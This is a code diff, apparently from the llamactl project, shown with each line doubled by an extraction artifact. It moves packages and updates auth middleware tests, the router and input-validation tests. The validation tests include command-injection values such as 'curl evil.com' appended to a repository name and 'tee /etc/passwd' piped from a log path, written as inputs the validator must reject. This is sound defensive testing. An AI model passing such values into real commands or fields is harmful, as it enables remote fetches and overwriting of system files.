||||||
{
|
{
|
||||||
name: "valid management key for management",
|
name: "valid management key for management",
|
||||||
keyType: llamactl.KeyTypeManagement,
|
keyType: server.KeyTypeManagement,
|
||||||
managementKeys: []string{"sk-management-admin123"},
|
managementKeys: []string{"sk-management-admin123"},
|
||||||
requestKey: "sk-management-admin123",
|
requestKey: "sk-management-admin123",
|
||||||
method: "GET",
|
method: "GET",
|
||||||
@@ -48,7 +48,7 @@ func TestAuthMiddleware(t *testing.T) {
|
|||||||
// Invalid key tests
|
// Invalid key tests
|
||||||
{
|
{
|
||||||
name: "inference key for management should fail",
|
name: "inference key for management should fail",
|
||||||
keyType: llamactl.KeyTypeManagement,
|
keyType: server.KeyTypeManagement,
|
||||||
inferenceKeys: []string{"sk-inference-user123"},
|
inferenceKeys: []string{"sk-inference-user123"},
|
||||||
requestKey: "sk-inference-user123",
|
requestKey: "sk-inference-user123",
|
||||||
method: "GET",
|
method: "GET",
|
||||||
@@ -56,7 +56,7 @@ func TestAuthMiddleware(t *testing.T) {
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "invalid inference key",
|
name: "invalid inference key",
|
||||||
keyType: llamactl.KeyTypeInference,
|
keyType: server.KeyTypeInference,
|
||||||
inferenceKeys: []string{"sk-inference-valid123"},
|
inferenceKeys: []string{"sk-inference-valid123"},
|
||||||
requestKey: "sk-inference-invalid",
|
requestKey: "sk-inference-invalid",
|
||||||
method: "GET",
|
method: "GET",
|
||||||
@@ -64,7 +64,7 @@ func TestAuthMiddleware(t *testing.T) {
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "missing inference key",
|
name: "missing inference key",
|
||||||
keyType: llamactl.KeyTypeInference,
|
keyType: server.KeyTypeInference,
|
||||||
inferenceKeys: []string{"sk-inference-valid123"},
|
inferenceKeys: []string{"sk-inference-valid123"},
|
||||||
requestKey: "",
|
requestKey: "",
|
||||||
method: "GET",
|
method: "GET",
|
||||||
@@ -72,7 +72,7 @@ func TestAuthMiddleware(t *testing.T) {
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "invalid management key",
|
name: "invalid management key",
|
||||||
keyType: llamactl.KeyTypeManagement,
|
keyType: server.KeyTypeManagement,
|
||||||
managementKeys: []string{"sk-management-valid123"},
|
managementKeys: []string{"sk-management-valid123"},
|
||||||
requestKey: "sk-management-invalid",
|
requestKey: "sk-management-invalid",
|
||||||
method: "GET",
|
method: "GET",
|
||||||
@@ -80,7 +80,7 @@ func TestAuthMiddleware(t *testing.T) {
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "missing management key",
|
name: "missing management key",
|
||||||
keyType: llamactl.KeyTypeManagement,
|
keyType: server.KeyTypeManagement,
|
||||||
managementKeys: []string{"sk-management-valid123"},
|
managementKeys: []string{"sk-management-valid123"},
|
||||||
requestKey: "",
|
requestKey: "",
|
||||||
method: "GET",
|
method: "GET",
|
||||||
@@ -90,7 +90,7 @@ func TestAuthMiddleware(t *testing.T) {
|
|||||||
// OPTIONS requests should always pass
|
// OPTIONS requests should always pass
|
||||||
{
|
{
|
||||||
name: "OPTIONS request bypasses inference auth",
|
name: "OPTIONS request bypasses inference auth",
|
||||||
keyType: llamactl.KeyTypeInference,
|
keyType: server.KeyTypeInference,
|
||||||
inferenceKeys: []string{"sk-inference-valid123"},
|
inferenceKeys: []string{"sk-inference-valid123"},
|
||||||
requestKey: "",
|
requestKey: "",
|
||||||
method: "OPTIONS",
|
method: "OPTIONS",
|
||||||
@@ -98,7 +98,7 @@ func TestAuthMiddleware(t *testing.T) {
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "OPTIONS request bypasses management auth",
|
name: "OPTIONS request bypasses management auth",
|
||||||
keyType: llamactl.KeyTypeManagement,
|
keyType: server.KeyTypeManagement,
|
||||||
managementKeys: []string{"sk-management-valid123"},
|
managementKeys: []string{"sk-management-valid123"},
|
||||||
requestKey: "",
|
requestKey: "",
|
||||||
method: "OPTIONS",
|
method: "OPTIONS",
|
||||||
@@ -108,7 +108,7 @@ func TestAuthMiddleware(t *testing.T) {
|
|||||||
// Cross-key-type validation
|
// Cross-key-type validation
|
||||||
{
|
{
|
||||||
name: "management key works for inference endpoint",
|
name: "management key works for inference endpoint",
|
||||||
keyType: llamactl.KeyTypeInference,
|
keyType: server.KeyTypeInference,
|
||||||
inferenceKeys: []string{},
|
inferenceKeys: []string{},
|
||||||
managementKeys: []string{"sk-management-admin"},
|
managementKeys: []string{"sk-management-admin"},
|
||||||
requestKey: "sk-management-admin",
|
requestKey: "sk-management-admin",
|
||||||
@@ -119,11 +119,11 @@ func TestAuthMiddleware(t *testing.T) {
|
|||||||
|
|
||||||
for _, tt := range tests {
|
for _, tt := range tests {
|
||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
config := llamactl.AuthConfig{
|
cfg := config.AuthConfig{
|
||||||
InferenceKeys: tt.inferenceKeys,
|
InferenceKeys: tt.inferenceKeys,
|
||||||
ManagementKeys: tt.managementKeys,
|
ManagementKeys: tt.managementKeys,
|
||||||
}
|
}
|
||||||
middleware := llamactl.NewAPIAuthMiddleware(config)
|
middleware := server.NewAPIAuthMiddleware(cfg)
|
||||||
|
|
||||||
// Create test request
|
// Create test request
|
||||||
req := httptest.NewRequest(tt.method, "/test", nil)
|
req := httptest.NewRequest(tt.method, "/test", nil)
|
||||||
@@ -133,12 +133,12 @@ func TestAuthMiddleware(t *testing.T) {
|
|||||||
|
|
||||||
// Create test handler using the appropriate middleware
|
// Create test handler using the appropriate middleware
|
||||||
var handler http.Handler
|
var handler http.Handler
|
||||||
if tt.keyType == llamactl.KeyTypeInference {
|
if tt.keyType == server.KeyTypeInference {
|
||||||
handler = middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
w.WriteHeader(http.StatusOK)
|
w.WriteHeader(http.StatusOK)
|
||||||
}))
|
}))
|
||||||
} else {
|
} else {
|
||||||
handler = middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
w.WriteHeader(http.StatusOK)
|
w.WriteHeader(http.StatusOK)
|
||||||
}))
|
}))
|
||||||
}
|
}
|
||||||
@@ -170,17 +170,17 @@ func TestAuthMiddleware(t *testing.T) {
|
|||||||
func TestGenerateAPIKey(t *testing.T) {
|
func TestGenerateAPIKey(t *testing.T) {
|
||||||
tests := []struct {
|
tests := []struct {
|
||||||
name string
|
name string
|
||||||
keyType llamactl.KeyType
|
keyType server.KeyType
|
||||||
}{
|
}{
|
||||||
{"inference key generation", llamactl.KeyTypeInference},
|
{"inference key generation", server.KeyTypeInference},
|
||||||
{"management key generation", llamactl.KeyTypeManagement},
|
{"management key generation", server.KeyTypeManagement},
|
||||||
}
|
}
|
||||||
|
|
||||||
for _, tt := range tests {
|
for _, tt := range tests {
|
||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
// Test auto-generation by creating config that will trigger it
|
// Test auto-generation by creating config that will trigger it
|
||||||
var config llamactl.AuthConfig
|
var config config.AuthConfig
|
||||||
if tt.keyType == llamactl.KeyTypeInference {
|
if tt.keyType == server.KeyTypeInference {
|
||||||
config.RequireInferenceAuth = true
|
config.RequireInferenceAuth = true
|
||||||
config.InferenceKeys = []string{} // Empty to trigger generation
|
config.InferenceKeys = []string{} // Empty to trigger generation
|
||||||
} else {
|
} else {
|
||||||
@@ -189,19 +189,19 @@ func TestGenerateAPIKey(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// Create middleware - this should trigger key generation
|
// Create middleware - this should trigger key generation
|
||||||
middleware := llamactl.NewAPIAuthMiddleware(config)
|
middleware := server.NewAPIAuthMiddleware(config)
|
||||||
|
|
||||||
// Test that auth is required (meaning a key was generated)
|
// Test that auth is required (meaning a key was generated)
|
||||||
req := httptest.NewRequest("GET", "/", nil)
|
req := httptest.NewRequest("GET", "/", nil)
|
||||||
recorder := httptest.NewRecorder()
|
recorder := httptest.NewRecorder()
|
||||||
|
|
||||||
var handler http.Handler
|
var handler http.Handler
|
||||||
if tt.keyType == llamactl.KeyTypeInference {
|
if tt.keyType == server.KeyTypeInference {
|
||||||
handler = middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
w.WriteHeader(http.StatusOK)
|
w.WriteHeader(http.StatusOK)
|
||||||
}))
|
}))
|
||||||
} else {
|
} else {
|
||||||
handler = middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
w.WriteHeader(http.StatusOK)
|
w.WriteHeader(http.StatusOK)
|
||||||
}))
|
}))
|
||||||
}
|
}
|
||||||
@@ -214,18 +214,18 @@ func TestGenerateAPIKey(t *testing.T) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// Test uniqueness by creating another middleware instance
|
// Test uniqueness by creating another middleware instance
|
||||||
middleware2 := llamactl.NewAPIAuthMiddleware(config)
|
middleware2 := server.NewAPIAuthMiddleware(config)
|
||||||
|
|
||||||
req2 := httptest.NewRequest("GET", "/", nil)
|
req2 := httptest.NewRequest("GET", "/", nil)
|
||||||
recorder2 := httptest.NewRecorder()
|
recorder2 := httptest.NewRecorder()
|
||||||
|
|
||||||
if tt.keyType == llamactl.KeyTypeInference {
|
if tt.keyType == server.KeyTypeInference {
|
||||||
handler2 := middleware2.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
handler2 := middleware2.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
w.WriteHeader(http.StatusOK)
|
w.WriteHeader(http.StatusOK)
|
||||||
}))
|
}))
|
||||||
handler2.ServeHTTP(recorder2, req2)
|
handler2.ServeHTTP(recorder2, req2)
|
||||||
} else {
|
} else {
|
||||||
handler2 := middleware2.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
handler2 := middleware2.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
w.WriteHeader(http.StatusOK)
|
w.WriteHeader(http.StatusOK)
|
||||||
}))
|
}))
|
||||||
handler2.ServeHTTP(recorder2, req2)
|
handler2.ServeHTTP(recorder2, req2)
|
||||||
@@ -307,21 +307,21 @@ func TestAutoGeneration(t *testing.T) {
|
|||||||
|
|
||||||
for _, tt := range tests {
|
for _, tt := range tests {
|
||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
config := llamactl.AuthConfig{
|
cfg := config.AuthConfig{
|
||||||
RequireInferenceAuth: tt.requireInference,
|
RequireInferenceAuth: tt.requireInference,
|
||||||
RequireManagementAuth: tt.requireManagement,
|
RequireManagementAuth: tt.requireManagement,
|
||||||
InferenceKeys: tt.providedInference,
|
InferenceKeys: tt.providedInference,
|
||||||
ManagementKeys: tt.providedManagement,
|
ManagementKeys: tt.providedManagement,
|
||||||
}
|
}
|
||||||
|
|
||||||
middleware := llamactl.NewAPIAuthMiddleware(config)
|
middleware := server.NewAPIAuthMiddleware(cfg)
|
||||||
|
|
||||||
// Test inference behavior if inference auth is required
|
// Test inference behavior if inference auth is required
|
||||||
if tt.requireInference {
|
if tt.requireInference {
|
||||||
req := httptest.NewRequest("GET", "/v1/models", nil)
|
req := httptest.NewRequest("GET", "/v1/models", nil)
|
||||||
recorder := httptest.NewRecorder()
|
recorder := httptest.NewRecorder()
|
||||||
|
|
||||||
handler := middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
handler := middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
w.WriteHeader(http.StatusOK)
|
w.WriteHeader(http.StatusOK)
|
||||||
}))
|
}))
|
||||||
|
|
||||||
@@ -338,7 +338,7 @@ func TestAutoGeneration(t *testing.T) {
|
|||||||
req := httptest.NewRequest("GET", "/api/v1/instances", nil)
|
req := httptest.NewRequest("GET", "/api/v1/instances", nil)
|
||||||
recorder := httptest.NewRecorder()
|
recorder := httptest.NewRecorder()
|
||||||
|
|
||||||
handler := middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
handler := middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
w.WriteHeader(http.StatusOK)
|
w.WriteHeader(http.StatusOK)
|
||||||
}))
|
}))
|
||||||
|
|
||||||
@@ -1,4 +1,4 @@
|
|||||||
package llamactl
|
package server
|
||||||
|
|
||||||
type OpenAIListInstancesResponse struct {
|
type OpenAIListInstancesResponse struct {
|
||||||
Object string `json:"object"`
|
Object string `json:"object"`
|
||||||
@@ -1,4 +1,4 @@
|
|||||||
package llamactl
|
package server
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"fmt"
|
"fmt"
|
||||||
@@ -18,7 +18,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
|
|||||||
|
|
||||||
// Add CORS middleware
|
// Add CORS middleware
|
||||||
r.Use(cors.Handler(cors.Options{
|
r.Use(cors.Handler(cors.Options{
|
||||||
AllowedOrigins: handler.config.Server.AllowedOrigins,
|
AllowedOrigins: handler.cfg.Server.AllowedOrigins,
|
||||||
AllowedMethods: []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
|
AllowedMethods: []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
|
||||||
AllowedHeaders: []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
|
AllowedHeaders: []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
|
||||||
ExposedHeaders: []string{"Link"},
|
ExposedHeaders: []string{"Link"},
|
||||||
@@ -27,9 +27,9 @@ func SetupRouter(handler *Handler) *chi.Mux {
|
|||||||
}))
|
}))
|
||||||
|
|
||||||
// Add API authentication middleware
|
// Add API authentication middleware
|
||||||
authMiddleware := NewAPIAuthMiddleware(handler.config.Auth)
|
authMiddleware := NewAPIAuthMiddleware(handler.cfg.Auth)
|
||||||
|
|
||||||
if handler.config.Server.EnableSwagger {
|
if handler.cfg.Server.EnableSwagger {
|
||||||
r.Get("/swagger/*", httpSwagger.Handler(
|
r.Get("/swagger/*", httpSwagger.Handler(
|
||||||
httpSwagger.URL("/swagger/doc.json"),
|
httpSwagger.URL("/swagger/doc.json"),
|
||||||
))
|
))
|
||||||
@@ -38,7 +38,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
|
|||||||
// Define routes
|
// Define routes
|
||||||
r.Route("/api/v1", func(r chi.Router) {
|
r.Route("/api/v1", func(r chi.Router) {
|
||||||
|
|
||||||
if authMiddleware != nil && handler.config.Auth.RequireManagementAuth {
|
if authMiddleware != nil && handler.cfg.Auth.RequireManagementAuth {
|
||||||
r.Use(authMiddleware.AuthMiddleware(KeyTypeManagement))
|
r.Use(authMiddleware.AuthMiddleware(KeyTypeManagement))
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -73,7 +73,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
|
|||||||
|
|
||||||
r.Route(("/v1"), func(r chi.Router) {
|
r.Route(("/v1"), func(r chi.Router) {
|
||||||
|
|
||||||
if authMiddleware != nil && handler.config.Auth.RequireInferenceAuth {
|
if authMiddleware != nil && handler.cfg.Auth.RequireInferenceAuth {
|
||||||
r.Use(authMiddleware.AuthMiddleware(KeyTypeInference))
|
r.Use(authMiddleware.AuthMiddleware(KeyTypeInference))
|
||||||
}
|
}
|
||||||
|
|
||||||
10
pkg/testutil/helpers.go
Normal file
10
pkg/testutil/helpers.go
Normal file
@@ -0,0 +1,10 @@
|
|||||||
|
package testutil
|
||||||
|
|
||||||
|
// Helper functions for pointer fields
|
||||||
|
func BoolPtr(b bool) *bool {
|
||||||
|
return &b
|
||||||
|
}
|
||||||
|
|
||||||
|
func IntPtr(i int) *int {
|
||||||
|
return &i
|
||||||
|
}
|
||||||
@@ -1,7 +1,8 @@
|
|||||||
package llamactl
|
package validation
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"fmt"
|
"fmt"
|
||||||
|
"llamactl/pkg/instance"
|
||||||
"reflect"
|
"reflect"
|
||||||
"regexp"
|
"regexp"
|
||||||
)
|
)
|
||||||
@@ -33,7 +34,7 @@ func validateStringForInjection(value string) error {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// ValidateInstanceOptions performs minimal security validation
|
// ValidateInstanceOptions performs minimal security validation
|
||||||
func ValidateInstanceOptions(options *CreateInstanceOptions) error {
|
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
|
||||||
if options == nil {
|
if options == nil {
|
||||||
return ValidationError(fmt.Errorf("options cannot be nil"))
|
return ValidationError(fmt.Errorf("options cannot be nil"))
|
||||||
}
|
}
|
||||||
@@ -101,16 +102,16 @@ func validateStructStrings(v any, fieldPath string) error {
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
func ValidateInstanceName(name string) error {
|
func ValidateInstanceName(name string) (string, error) {
|
||||||
// Validate instance name
|
// Validate instance name
|
||||||
if name == "" {
|
if name == "" {
|
||||||
return ValidationError(fmt.Errorf("name cannot be empty"))
|
return "", ValidationError(fmt.Errorf("name cannot be empty"))
|
||||||
}
|
}
|
||||||
if !validNamePattern.MatchString(name) {
|
if !validNamePattern.MatchString(name) {
|
||||||
return ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
|
return "", ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
|
||||||
}
|
}
|
||||||
if len(name) > 50 {
|
if len(name) > 50 {
|
||||||
return ValidationError(fmt.Errorf("name too long (max 50 characters)"))
|
return "", ValidationError(fmt.Errorf("name too long (max 50 characters)"))
|
||||||
}
|
}
|
||||||
return nil
|
return name, nil
|
||||||
}
|
}
|
||||||
@@ -1,10 +1,12 @@
|
|||||||
package llamactl_test
|
package validation_test
|
||||||
|
|
||||||
import (
|
import (
|
||||||
|
"llamactl/pkg/backends/llamacpp"
|
||||||
|
"llamactl/pkg/instance"
|
||||||
|
"llamactl/pkg/testutil"
|
||||||
|
"llamactl/pkg/validation"
|
||||||
"strings"
|
"strings"
|
||||||
"testing"
|
"testing"
|
||||||
|
|
||||||
llamactl "llamactl/pkg"
|
|
||||||
)
|
)
|
||||||
|
|
||||||
func TestValidateInstanceName(t *testing.T) {
|
func TestValidateInstanceName(t *testing.T) {
|
||||||
@@ -39,16 +41,23 @@ func TestValidateInstanceName(t *testing.T) {
|
|||||||
|
|
||||||
for _, tt := range tests {
|
for _, tt := range tests {
|
||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
err := llamactl.ValidateInstanceName(tt.input)
|
name, err := validation.ValidateInstanceName(tt.input)
|
||||||
if (err != nil) != tt.wantErr {
|
if (err != nil) != tt.wantErr {
|
||||||
t.Errorf("ValidateInstanceName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
|
t.Errorf("ValidateInstanceName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
|
||||||
}
|
}
|
||||||
|
if tt.wantErr {
|
||||||
|
return // Skip further checks if we expect an error
|
||||||
|
}
|
||||||
|
// If no error, check that the name is returned as expected
|
||||||
|
if name != tt.input {
|
||||||
|
t.Errorf("ValidateInstanceName(%q) = %q, want %q", tt.input, name, tt.input)
|
||||||
|
}
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func TestValidateInstanceOptions_NilOptions(t *testing.T) {
|
func TestValidateInstanceOptions_NilOptions(t *testing.T) {
|
||||||
err := llamactl.ValidateInstanceOptions(nil)
|
err := validation.ValidateInstanceOptions(nil)
|
||||||
if err == nil {
|
if err == nil {
|
||||||
t.Error("Expected error for nil options")
|
t.Error("Expected error for nil options")
|
||||||
}
|
}
|
||||||
@@ -73,13 +82,13 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
|
|||||||
|
|
||||||
for _, tt := range tests {
|
for _, tt := range tests {
|
||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
options := &llamactl.CreateInstanceOptions{
|
options := &instance.CreateInstanceOptions{
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Port: tt.port,
|
Port: tt.port,
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
err := llamactl.ValidateInstanceOptions(options)
|
err := validation.ValidateInstanceOptions(options)
|
||||||
if (err != nil) != tt.wantErr {
|
if (err != nil) != tt.wantErr {
|
||||||
t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
|
t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
|
||||||
}
|
}
|
||||||
@@ -126,13 +135,13 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
|
|||||||
for _, tt := range tests {
|
for _, tt := range tests {
|
||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
// Test with Model field (string field)
|
// Test with Model field (string field)
|
||||||
options := &llamactl.CreateInstanceOptions{
|
options := &instance.CreateInstanceOptions{
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Model: tt.value,
|
Model: tt.value,
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
err := llamactl.ValidateInstanceOptions(options)
|
err := validation.ValidateInstanceOptions(options)
|
||||||
if (err != nil) != tt.wantErr {
|
if (err != nil) != tt.wantErr {
|
||||||
t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
|
t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
|
||||||
}
|
}
|
||||||
@@ -163,13 +172,13 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
|
|||||||
for _, tt := range tests {
|
for _, tt := range tests {
|
||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
// Test with Lora field (array field)
|
// Test with Lora field (array field)
|
||||||
options := &llamactl.CreateInstanceOptions{
|
options := &instance.CreateInstanceOptions{
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Lora: tt.array,
|
Lora: tt.array,
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
err := llamactl.ValidateInstanceOptions(options)
|
err := validation.ValidateInstanceOptions(options)
|
||||||
if (err != nil) != tt.wantErr {
|
if (err != nil) != tt.wantErr {
|
||||||
t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
|
t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
|
||||||
}
|
}
|
||||||
@@ -181,13 +190,13 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
|||||||
// Test that injection in any field is caught
|
// Test that injection in any field is caught
|
||||||
tests := []struct {
|
tests := []struct {
|
||||||
name string
|
name string
|
||||||
options *llamactl.CreateInstanceOptions
|
options *instance.CreateInstanceOptions
|
||||||
wantErr bool
|
wantErr bool
|
||||||
}{
|
}{
|
||||||
{
|
{
|
||||||
name: "injection in model field",
|
name: "injection in model field",
|
||||||
options: &llamactl.CreateInstanceOptions{
|
options: &instance.CreateInstanceOptions{
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Model: "safe.gguf",
|
Model: "safe.gguf",
|
||||||
HFRepo: "microsoft/model; curl evil.com",
|
HFRepo: "microsoft/model; curl evil.com",
|
||||||
},
|
},
|
||||||
@@ -196,8 +205,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "injection in log file",
|
name: "injection in log file",
|
||||||
options: &llamactl.CreateInstanceOptions{
|
options: &instance.CreateInstanceOptions{
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Model: "safe.gguf",
|
Model: "safe.gguf",
|
||||||
LogFile: "/tmp/log.txt | tee /etc/passwd",
|
LogFile: "/tmp/log.txt | tee /etc/passwd",
|
||||||
},
|
},
|
||||||
@@ -206,8 +215,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "all safe fields",
|
name: "all safe fields",
|
||||||
options: &llamactl.CreateInstanceOptions{
|
options: &instance.CreateInstanceOptions{
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
HFRepo: "microsoft/DialoGPT-medium",
|
HFRepo: "microsoft/DialoGPT-medium",
|
||||||
LogFile: "/tmp/llama.log",
|
LogFile: "/tmp/llama.log",
|
||||||
@@ -221,7 +230,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
|||||||
|
|
||||||
for _, tt := range tests {
|
for _, tt := range tests {
|
||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
err := llamactl.ValidateInstanceOptions(tt.options)
|
err := validation.ValidateInstanceOptions(tt.options)
|
||||||
if (err != nil) != tt.wantErr {
|
if (err != nil) != tt.wantErr {
|
||||||
t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
|
t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
|
||||||
}
|
}
|
||||||
@@ -231,11 +240,11 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
|||||||
|
|
||||||
func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
|
func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
|
||||||
// Test that non-string fields don't interfere with validation
|
// Test that non-string fields don't interfere with validation
|
||||||
options := &llamactl.CreateInstanceOptions{
|
options := &instance.CreateInstanceOptions{
|
||||||
AutoRestart: boolPtr(true),
|
AutoRestart: testutil.BoolPtr(true),
|
||||||
MaxRestarts: intPtr(5),
|
MaxRestarts: testutil.IntPtr(5),
|
||||||
RestartDelay: intPtr(10),
|
RestartDelay: testutil.IntPtr(10),
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
GPULayers: 32,
|
GPULayers: 32,
|
||||||
CtxSize: 4096,
|
CtxSize: 4096,
|
||||||
@@ -247,17 +256,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
|
|||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
err := llamactl.ValidateInstanceOptions(options)
|
err := validation.ValidateInstanceOptions(options)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
|
t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// Helper functions for pointer fields
|
|
||||||
func boolPtr(b bool) *bool {
|
|
||||||
return &b
|
|
||||||
}
|
|
||||||
|
|
||||||
func intPtr(i int) *int {
|
|
||||||
return &i
|
|
||||||
}
|
|
||||||
@@ -7,8 +7,8 @@ import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'
|
|||||||
|
|
||||||
interface ZodFormFieldProps {
|
interface ZodFormFieldProps {
|
||||||
fieldKey: keyof CreateInstanceOptions
|
fieldKey: keyof CreateInstanceOptions
|
||||||
value: any
|
value: string | number | boolean | string[] | undefined
|
||||||
onChange: (key: keyof CreateInstanceOptions, value: any) => void
|
onChange: (key: keyof CreateInstanceOptions, value: string | number | boolean | string[] | undefined) => void
|
||||||
}
|
}
|
||||||
|
|
||||||
const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => {
|
const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => {
|
||||||
@@ -18,7 +18,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
|
|||||||
// Get type from Zod schema
|
// Get type from Zod schema
|
||||||
const fieldType = getFieldType(fieldKey)
|
const fieldType = getFieldType(fieldKey)
|
||||||
|
|
||||||
